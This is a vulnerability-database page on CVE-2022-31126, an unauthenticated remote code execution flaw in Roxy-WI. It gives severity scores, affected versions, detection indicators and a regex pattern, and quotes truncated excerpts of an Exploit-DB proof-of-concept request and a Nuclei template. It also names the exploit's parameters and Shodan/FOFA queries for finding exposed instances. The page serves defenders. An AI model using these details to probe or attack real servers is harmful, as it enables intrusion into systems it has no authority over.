CVE-2022-31126
published 2022-07-06CVE-2022-31126: Roxy-wi is an open source web interface for managing Haproxy, Nginx, Apache and Keepalived servers. A vulnerability in Roxy-wi allows a remote, unauthenticated…
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
40.98%
98.5th percentile
Roxy-wi is an open source web interface for managing Haproxy, Nginx, Apache and Keepalived servers. A vulnerability in Roxy-wi allows a remote, unauthenticated attacker to code execution by sending a specially crafted HTTP request to /app/options.py file. This affects Roxy-wi versions before 6.1.1.0. Users are advised to upgrade. There are no known workarounds for this issue.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hap-wi | roxy-wi | < 6.1.1.0 | 6.1.1.0 |
| roxy-wi | roxy-wi | < 6.1.1.0 | 6.1.1.0 |
Detection & IOCsextracted from sources · hover to see the quote
yara↗
regex: uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)
- →The exploit payload uses an empty 'token' field alongside 'show_versions=1' and 'alert_consumer=1', indicating no authentication is required. Alert on POST to /app/options.py with token= (empty). ↗
- →Successful exploitation returns output matching 'uid=...gid=...' in the HTTP response body. Monitor HTTP 200 responses from /app/options.py containing this pattern. ↗
- →Use Shodan/FOFA queries to identify exposed Roxy-WI instances as potential targets: Shodan html:"Roxy-WI", FOFA body="roxy-wi". ↗
- →The vulnerable code path involves the ssh_command function in /app/funct.py which does not sanitize user-supplied input before executing system commands. ↗
- ·The PoC uses 'serv=127.0.0.1' as the server parameter; in real attacks this value may vary. Detection rules should not rely solely on this specific IP value. ↗
- ·This vulnerability affects Roxy-WI versions strictly before 6.1.1.0. Versions 6.1.1.0 and later are not affected. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
exploitdb·2023-04-03·CVSS 10.0
CVE-2022-31126 [CRITICAL] Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
---
# ADVISORY INFORMATION
# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
# Date of found: 21 July 2022
# Application: Roxy WI <= v6.1.0.0
# Author: Nuri Çilengir
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31126
# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-
Nuclei
Roxy-WI - Remote Code Execution
nuclei·CVSS 9.8
CVE-2022-31126 [CRITICAL] Roxy-WI - Remote Code Execution
Roxy-WI - Remote Code Execution
Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the ssh_command function without processing the inputs received from the user in the /app/funct.py file.
Template:
id: CVE-2022-31126
info:
name: Roxy-WI - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the ssh_command function without processing the inputs received from the user in the /app/funct.py file.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Users are advised to upgrade to latest version.
reference:
- https://pent
No writeups or analysis indexed.
2022-07-06
Published
Exploited in the wild